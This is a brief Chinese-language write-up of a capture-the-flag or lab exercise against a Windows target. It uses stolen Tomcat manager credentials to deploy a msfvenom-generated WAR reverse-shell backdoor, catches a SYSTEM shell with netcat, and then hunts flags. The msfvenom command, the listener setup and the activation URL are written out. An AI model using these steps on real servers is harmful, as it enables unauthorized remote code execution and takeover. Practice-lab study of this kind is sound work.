上一次
拿到tomcat用户名和密码后,可以从tomcat入手,在管理页登录
这里显示能上传一个.war文件,我用msfvenom生成一个war的后门
msfvenom -p windows/x64/shell_reverse_tcp -f LHOST=192.168.0.108 LPORT=4545
payload.war
这次不用metasploit,改用netcat侦听4545端口
然后将生成的payload.war用jar分离出.jsp
文件:
jar -xvf payload.war
将payload.war上传到靶机,运行
deploy,网页跳转,
访问
http://192.168.0.104:8282/payload/cugxcageiouu.jsp来激活payload
nc侦听那边已经显示拿到shell了,whoami查一下,还是system权限
所以可以来猎杀那些flag了
不过nc的shell远不如meterpreter方便